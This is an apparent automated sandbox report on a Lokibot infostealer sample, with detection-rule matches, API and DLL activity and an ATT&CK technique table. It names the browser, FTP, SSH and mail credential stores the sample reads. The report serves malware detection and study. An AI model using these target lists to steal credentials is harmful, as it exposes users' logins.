                          Source: 0.0.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                          Source: 0.2.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                          Source: 0.2.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                          Source: 0.0.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                          Source: 0.2.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                          Source: 0.2.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                          Source: 0.2.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                          Source: 0.0.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                          Source: 0.0.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                          Source: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                          Source: 00000000.00000000.2104706247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                          Source: 00000000.00000000.2104724175.0000000000415000.00000008.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                          Source: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                          Source: Process Memory Space: 0yWVteGq5T.exe PID: 3416, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/2@0/1
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeCode function: 0_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,0_2_0040650A
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeCode function: 0_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,0_2_0040434D
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\21c8026919fd094ab07ec3c180a9f210_9e146be9-c76a-4720-bcdb-53011b87bd06Jump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeMutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
                          Source: 0yWVteGq5T.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: 0yWVteGq5T.exe, 00000000.00000003.2105598085.0000000002455000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: 0yWVteGq5T.exeReversingLabs: Detection: 97%
                          Source: 0yWVteGq5T.exeVirustotal: Detection: 87%
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeSection loaded: vaultcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeSection loaded: netapi32.dllJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeSection loaded: samcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeSection loaded: samlib.dllJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior

                          Data Obfuscation

                          barindex
                          Source: Yara matchFile source: 0yWVteGq5T.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.2104724175.0000000000415000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 0yWVteGq5T.exe PID: 3416, type: MEMORYSTR
                          Source: 0yWVteGq5T.exeStatic PE information: section name: .x
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeCode function: 0_2_00402AC0 push eax; ret 0_2_00402AD4
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeCode function: 0_2_00402AC0 push eax; ret 0_2_00402AFC
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exe TID: 5580Thread sleep time: -480000s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeCode function: 0_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,0_2_00403D74
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeThread delayed: delay time: 60000Jump to behavior
                          Source: 0yWVteGq5T.exe, 00000000.00000002.3354762092.000000000059E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeCode function: 0_2_0040317B mov eax, dword ptr fs:[00000030h]0_2_0040317B
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeCode function: 0_2_00402B7C GetProcessHeap,RtlAllocateHeap,0_2_00402B7C
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeCode function: 0_2_00406069 GetUserNameW,0_2_00406069
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                          Stealing of Sensitive Information

                          barindex
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Source: Yara matchFile source: 00000000.00000002.3354762092.000000000059E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 0yWVteGq5T.exe PID: 3416, type: MEMORYSTR
                          Source: Yara matchFile source: 0yWVteGq5T.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.2104724175.0000000000415000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmp, type: MEMORY
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeCode function: PopPassword0_2_0040D069
                          Source: C:\Users\user\Desktop\0yWVteGq5T.exeCode function: SmtpPassword0_2_0040D069
                          Source: Yara matchFile source: 0yWVteGq5T.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.2104724175.0000000000415000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmp, type: MEMORY

                          Remote Access Functionality

                          barindex
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Source: Yara matchFile source: 00000000.00000002.3354762092.000000000059E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 0yWVteGq5T.exe PID: 3416, type: MEMORYSTR
                          Source: Yara matchFile source: 0yWVteGq5T.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.2104724175.0000000000415000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmp, type: MEMORY
                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                          DLL Side-Loading
                          1
                          Access Token Manipulation
                          1
                          Masquerading
                          2
                          OS Credential Dumping
                          11
                          Security Software Discovery
                          Remote Services1
                          Email Collection
                          1
                          Encrypted Channel
                          Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                          DLL Side-Loading
                          11
                          Virtualization/Sandbox Evasion
                          2
                          Credentials in Registry
                          11
                          Virtualization/Sandbox Evasion
                          Remote Desktop Protocol1
                          Archive Collected Data
                          3
                          Ingress Tool Transfer
                          Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                          Access Token Manipulation
                          Security Account Manager1
                          Account Discovery
